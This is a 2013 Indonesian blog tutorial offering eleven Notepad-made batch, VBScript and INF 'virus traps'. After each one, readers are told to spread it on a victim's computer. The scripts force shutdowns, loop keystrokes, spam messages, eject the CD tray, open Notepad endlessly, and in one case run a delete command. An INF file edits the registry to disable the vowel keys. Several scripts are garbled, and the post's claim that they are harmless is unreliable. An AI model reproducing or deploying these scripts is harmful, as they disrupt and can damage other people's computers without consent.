Berbagi Semua Tentang Tutorial Blogger SEO Anime

Jebakan Virus Dengan Notepad

Ditulis Unknown Pada Jumat, Maret 15, 2013 , 3 komentar

1. Membuat Komputer Force Shut Down
  • Buka Notepad ;
  • Masukkan script dibawah ini :
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
  • Simpan dengan nama file DBhack.BAT dan tipe All File ;
  • Sebarkan di komputer Korban .

2. Membuat Tombol Caps Lock Menyala Terus
  • Buka Notepad ;
  • Masukkan script dibawah ini :
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
  • Simpan kode script tersebut , dengan nama file DBhack.VBS dan tipe All File ;
  • Jangan lupa , sebarkan di komputer si korban .
3. Mengerjai dengan Pesan yang Muncul Terus Menerus
  • Buka Notepad ;
  • Masukkan kode script berikut ini :
@ECHO off
:Begin
msg * pesan kalianmsg * pesan kalianmsg * pesan kalianmsg * pesan kalianmsg * pesan kalianGOTO BEGIN
  • Simpan dengan nama DBhack.BAT dan tipe All File
  • Sebarkan di komputer si korban
 [ Bila ingin menambah jumlah pesan , tinggal tambahkan saja { msg * pesan kalian } ]

4. Membuat CD-Rom Membuka dan Menutup Berulang Kali
  • Buka Notepad ;
  • Masukkan Script ini :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
  • Simpan dengan nama  DBhack.VBS dan Tipe All File;
  • Sebarkan di komputer korban .
5. Membuat Script Muncul Terus
  • Buka Notepad ;
  • Masukkan script dibawah ini :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
  • Simpan dengan nama file DBhack.VBS dan tipe All File ;
  • Sebarkan di komputer Korban .
6. Membuat Tombol Backspace Menjadi Error [menekan terus menerus] 
  • Buka Notepad ;
  • Masukkan script dibawah ini :

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
  • Simpan dengan nama file DBhack.VBS dan tipe All File ;
  • Sebarkan di komputer Korban .
7Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad
  • Buka Notepad ;
  • Masukkan script dibawah ini :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget" <<< pesan bisa diganti
loop
  • Simpan dengan nama file DBhack.VBS dan tipe All File ;
  • Sebarkan di komputer Korban .
8. Membuka Notepad Terus Menerus
  • Buka Notepad ;
  • Masukkan script dibawah ini :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
  • Simpan dengan nama file DBhack.BAT dan tipe All File ;
  • Sebarkan di komputer Korban .
9. Membuat Notepad dengan Pesan Jail
  • Buka Notepad ;
  • Masukkan script dibawah ini :
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!!"
  • Simpan dengan nama file DBhack.VBS dan tipe All File ;
  • Sebarkan di komputer Korban .
10. Membuat Memilih jawaban seperti Quiz di Notepad 
  • Buka Notepad ;
  • Masukkan script dibawah ini :
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
  • Simpan dengan nama file DBhack.VBS dan tipe All File ;
  • Sebarkan di komputer Korban .
11. Membuat tombol A-I-U-E-O mati pada keyboard 
  • Buka Notepad ;
  • Masukkan script dibawah ini :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
  • Simpan dengan nama file Jail.INF dan tipe All File ;
  • Log Off , maka aiueo akan mati .....
Cara mengenbalikannya
  • Buka Notepad ;
  • Masukkan script dibawah ini :
[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
  • Simpan dengan nama file Jail.INF dan tipe All File ;
  • Log Off , maka aiueo akan kembali hidup

Script masih bisa ditambah atau di gabung dengan script lain ....
NB : Virus ini tidak "BERBAHAYA"
Jebakan Virus Dengan Notepad
Jebakan Virus Dengan Notepad - Ditulis Oleh Unknown , Pada Jumat, Maret 15, 2013, Kategori : Info . Dan Memiliki 3 komentar
Unknown
caara mengembalikan semuanya itu kembali normal gi mana??
kasian laptop temen sya :D
Reply Delete
Unknown
cara mengembalikan semua itu bagaimana??
kasian laptop temen saya :D
Reply Delete
Unknown
tinggal di delete aja filenya ^_^
Reply Delete
Cancel Reply
GetID

Kontes SEO

Download Software Gratis
Copyright ©2013 Rizal-Webz Bali Blogers
Theme designed by BlogRinata - Edited by BaliBlogers
Powered by Blogger